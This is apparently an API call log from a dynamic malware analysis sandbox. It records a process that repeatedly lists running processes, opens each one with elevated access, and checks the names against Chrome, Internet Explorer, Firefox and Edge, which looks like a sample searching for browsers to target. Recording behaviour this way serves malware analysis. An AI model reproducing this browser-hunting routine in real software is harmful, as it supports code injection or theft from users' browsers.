	[0245.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9218
	[0245.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.227] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.227] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.227] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.228] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.228] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0245.228] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x921c
	[0245.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.229] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0245.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.229] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.229] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0245.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.229] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.230] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.230] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9220
	[0245.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.230] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.231] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.231] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.231] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.232] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0245.233] CloseHandle (hObject=0x4fd0) returned 1
	[0245.233] Sleep (dwMilliseconds=0x64) 
	[0245.342] GetCurrentProcessId () returned 0x110
	[0245.343] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0245.346] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0245.347] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0245.348] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0245.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9224
	[0245.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.349] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.350] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.350] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.350] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.351] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.352] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9228
	[0245.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.352] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.352] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.353] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.353] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.354] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0245.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x922c
	[0245.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.355] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0245.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.355] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.356] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0245.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.356] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.357] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.359] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9230
	[0245.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.359] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.359] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.359] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.360] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.360] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0245.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9234
	[0245.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.361] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0245.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.361] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.361] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0245.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.362] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.362] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0245.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9238
	[0245.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.363] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0245.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.363] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.363] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0245.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.364] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.364] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0245.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x923c
	[0245.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.365] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0245.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.365] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.365] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0245.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.366] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.366] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0245.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9240
	[0245.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.367] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0245.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.367] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.367] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0245.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.367] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.368] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.368] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9244
	[0245.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.368] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.369] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.369] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.369] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.370] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9248
	[0245.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.370] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.371] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.371] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.371] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.372] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x924c
	[0245.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.372] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.374] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.374] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.374] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.374] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.375] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9250
	[0245.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.375] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.376] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.376] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.376] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.377] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.378] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9254
	[0245.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.378] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.378] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.379] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.379] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.379] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.380] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9258
	[0245.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.380] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.381] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.381] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.381] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.381] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.382] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x925c
	[0245.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.382] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.383] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.383] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.383] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.384] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0245.384] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9260
	[0245.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.384] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0245.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.385] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.385] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0245.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.385] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.386] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.386] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9264
	[0245.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.386] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.387] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.387] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.387] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.388] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0245.397] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9268
	[0245.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.397] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.398] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.398] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.398] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.399] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x926c
	[0245.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.400] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0245.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.400] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.400] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0245.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.400] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.401] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9270
	[0245.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.402] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.402] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.402] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.402] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.403] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.403] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9274
	[0245.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.403] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0245.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.404] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.405] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0245.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.405] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
